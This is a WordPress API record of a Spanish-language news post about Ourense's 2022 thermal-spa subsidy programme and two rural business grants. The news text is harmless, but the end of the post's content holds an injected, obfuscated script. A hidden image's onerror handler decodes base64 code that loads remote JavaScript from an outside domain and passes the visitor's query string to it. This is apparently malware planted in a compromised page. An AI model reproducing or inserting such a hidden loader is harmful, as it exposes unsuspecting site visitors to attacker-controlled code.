{"id":4966,"date":"2021-12-21T21:19:07","date_gmt":"2021-12-22T00:19:07","guid":{"rendered":"https:\/\/argentinatermal.com.ar\/?p=4966"},"modified":"2025-08-13T16:24:14","modified_gmt":"2025-08-13T19:24:14","slug":"mas-de-cien-mil-euros-para-la-promocion-termal-de-ourense","status":"publish","type":"post","link":"https:\/\/argentinatermal.com.ar\/?p=4966","title":{"rendered":"M\u00e1s de cien mil euros para la promoci\u00f3n termal de Ourense"},"content":{"rendered":"\n<h3 class=\"wp-block-heading\"><strong>El gobierno provincial aprob\u00f3 su oferta de termalismo social para 2022<\/strong><\/h3>\n\n\n\n<p>El programa de Termalismo Saudable e Cultura Termal 2022 contar\u00e1 con un\u00a0<strong>presupuesto de 105.000 euros<\/strong>\u00a0y ofertar\u00e1 estancias y tratamientos en\u00a0<a href=\"https:\/\/www.laregion.es\/articulo\/ourense\/es-oferta-balnearios-ourense-nuevo-programa-termalismo-social\/202110071950281070055.html\" target=\"_blank\" rel=\"noreferrer noopener\">siete balnearios de la provincia<\/a>. Los centros termales adheridos a dicho programa, cuyas bases se aprobaron durante la junta de gobierno de la Diputaci\u00f3n celebrada ayer, son los de\u00a0<strong>Ba\u00f1os de Molgas, O Carballi\u00f1o, Arnoia, Laias, Lobios, Cortegada y Caldas de Partovia.\u00a0<\/strong><\/p>\n\n\n\n<p>En cuanto al programa de termalismo social, desde la Diputaci\u00f3n se\u00f1alan que el objetivo principal de esta iniciativa es \u201ca promoci\u00f3n do sector termal como \u00e1rea econ\u00f3mica e social estrat\u00e9xica para a provincia\u201d.&nbsp;<\/p>\n\n\n\n<p>Esta iniciativa consta en dos modalidades, la de estancias balnearias (con o sin transporte en tren hasta los centros) y los tratamientos terap\u00e9uticos sin estancia. Las estancias balnearias, con&nbsp;<strong>ayudas que oscilan desde los 10 hasta los 60 euros<\/strong>, tendr\u00e1n una duraci\u00f3n de seis d\u00edas, de lunes a s\u00e1bado, en r\u00e9gimen de pensi\u00f3n completa, incluyendo 10 t\u00e9cnicas balnearias, la posibilidad de revisi\u00f3n m\u00e9dica y animaci\u00f3n social. Para las estancias con transporte en tren, los usuarios tienen incluido el billete de ida y vuelta desde alguna de las \u201cestaci\u00f3ns termais\u201d que participan en el programa con destino a la terminal de Ourense.&nbsp;<\/p>\n\n\n\n<p>Existen tambi\u00e9n estancias con o sin tren para grupos, que deber\u00e1n estar formados por un m\u00ednimo de 20 personas. Por \u00faltimo, los tratamientos terap\u00e9uticos sin estancia (reumatol\u00f3gicos y respiratorios) incluyen ayudas de entre 20 y 70 euros, con consulta m\u00e9dica y la posibilidad de disfrutar de 35, 20 o 10 t\u00e9cnicas balnearias repartidas a lo largo de quince d\u00edas.<\/p>\n\n\n\n<p>Adem\u00e1s, el programa de Cultura Termal financia con entre 10 y 20 euros estancias de fin de semana en los balnearios de la provincia de dos d\u00edas de duraci\u00f3n, de s\u00e1bado a domingo, incluyendo pensi\u00f3n completa y dos t\u00e9cnicas balnearias para adultos. Las ayudas se conceder\u00e1n desde el d\u00eda siguiente a la publicaci\u00f3n de sus bases en el Bolet\u00edn Oficial de la Provincia, y por orden de recepci\u00f3n de las solicitudes hasta agotar su presupuesto.<\/p>\n\n\n\n<h2 class=\"wp-block-heading\"><strong>EMPRENDIMIENTO RURAL<\/strong><\/h2>\n\n\n\n<p>Adem\u00e1s, la junta de gobierno aprob\u00f3 dos nuevas ayudas en el marco del programa EmprendOU para proyectos empresariales y de autoempleo en municipios rurales en situaci\u00f3n de declive demogr\u00e1fico. Las aportaciones, con un importe m\u00e1ximo cada una de ellas de 8.685 euros, tienen como beneficiarios a dos proyectos relacionados con los servicios de est\u00e9tica y hosteler\u00eda en los ayuntamientos de Sarreaus y Xinzo de Limia.<\/p>\n\n\n\n<figure class=\"wp-block-image size-large is-resized\"><a href=\"https:\/\/www.laregion.es\/articulo\/ourense\/mas-cien-mil-euros-promocion-termal\/202112202307441092425.html?fbclid=IwAR1AcLOWLcQVEWCh0LNL3Y3OSnFAuuKZFm40Xv0c6bgA4bDlr17ugJB2_xY\" target=\"_blank\" rel=\"noopener\"><img decoding=\"async\" src=\"https:\/\/www.laregion.es\/media\/laregion\/images\/2021\/01\/01\/2021010100000068953.png\" alt=\"\" width=\"196\" height=\"36\" \/><\/a><figcaption>Fuente:<\/figcaption><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>El gobierno provincial aprob\u00f3 su oferta de termalismo social para 2022 El programa de Termalismo Saudable e Cultura Termal 2022 contar\u00e1 con un\u00a0presupuesto de 105.000 euros\u00a0y ofertar\u00e1 estancias y tratamientos en\u00a0siete balnearios de la provincia. Los centros termales adheridos a dicho programa, cuyas bases se aprobaron durante la junta de gobierno de la Diputaci\u00f3n celebrada [&hellip;]<\/p>\n","protected":false},"author":1,"featured_media":4967,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[27,12,28],"tags":[],"class_list":["post-4966","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-enlaces-y-revistas","category-internacionales","category-portales-de-servicios-e-informacion"],"_links":{"self":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4966","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=4966"}],"version-history":[{"count":3,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4966\/revisions"}],"predecessor-version":[{"id":10730,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/4966\/revisions\/10730"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=\/wp\/v2\/media\/4967"}],"wp:attachment":[{"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=4966"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=4966"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/argentinatermal.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=4966"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}